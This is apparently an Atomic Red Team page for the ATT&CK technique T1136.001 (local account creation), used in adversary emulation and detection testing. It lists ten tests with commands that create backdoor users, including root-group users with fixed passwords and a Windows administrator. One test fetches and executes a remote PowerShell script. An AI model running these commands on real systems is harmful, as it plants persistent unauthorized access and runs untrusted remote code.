T1136.001
Create Account: Local Account
Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. In Linux, the useradd command can be used, while on macOS systems, the dscl -create command can be used. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, to ESXi servers via esxcli system account add, or to Kubernetes clusters using the kubectl utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Adversaries may also create new local accounts on network firewall management consoles – for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.(Citation: Cyber Security News)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Atomic Tests
-
Atomic Test #6 - Create a new user in Linux with
rootUID and GID. -
Atomic Test #7 - Create a new user in FreeBSD with
rootGID.
Atomic Test #1 - Create a user account on a Linux system
Create a user via useradd
Supported Platforms: Linux
auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
useradd -M -N -r -s /bin/bash -c evil_account #{username}Cleanup Commands:
userdel #{username}Atomic Test #2 - Create a user account on a FreeBSD system
Create a user via pw
Supported Platforms: Linux
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_accountCleanup Commands:
rmuser -y #{username}Atomic Test #3 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
Supported Platforms: macOS
auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
| realname | 'realname' to record when creating the user | string | Evil Account |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}Cleanup Commands:
dscl . -delete /Users/#{username}Atomic Test #4 - Create a new user in a command prompt
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD"
Supported Platforms: Windows
auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_CMD |
| password | Password of the user to create | string | T1136.001_CMD! |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
net user /add "#{username}" "#{password}"Cleanup Commands:
net user /del "#{username}" >nul 2>&1Atomic Test #5 - Create a new user in PowerShell
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell"
Supported Platforms: Windows
auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_PowerShell |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-LocalUser -Name "#{username}" -NoPasswordCleanup Commands:
Remove-LocalUser -Name "#{username}" -ErrorAction IgnoreAtomic Test #6 - Create a new user in Linux with root UID and GID.
Creates a new user in Linux and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;Cleanup Commands:
userdel #{username}Atomic Test #7 - Create a new user in FreeBSD with root GID.
Creates a new user in FreeBSD and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0Cleanup Commands:
pw userdel #{username}Atomic Test #8 - Create a new Windows admin user
Creates a new admin user in a command prompt.
Supported Platforms: Windows
auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_Admin |
| password | Password of the user to create | string | T1136_pass |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /addCleanup Commands:
net user /del "#{username}" >nul 2>&1Atomic Test #9 - Create a new Windows admin user via .NET
Creates a new admin user in a powershell session without using net.exe
Supported Platforms: Windows
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')Atomic Test #10 - Create a Linux user via kubectl in a Pod
Launches a short-lived Alpine pod and creates a Linux user inside the pod. The pod is automatically deleted after execution.
Supported Platforms: Containers
auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd |
| username | Username of the user to create inside the pod | string | evil_user |
| image_name | Name of the docker image | string | alpine |
Attack Commands: Run with bash!
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'Dependencies: Run with bash!
Description: kubectl must be installed and configured
Check Prereq Commands:
which kubectlGet Prereq Commands:
echo "kubectl must be installed manually"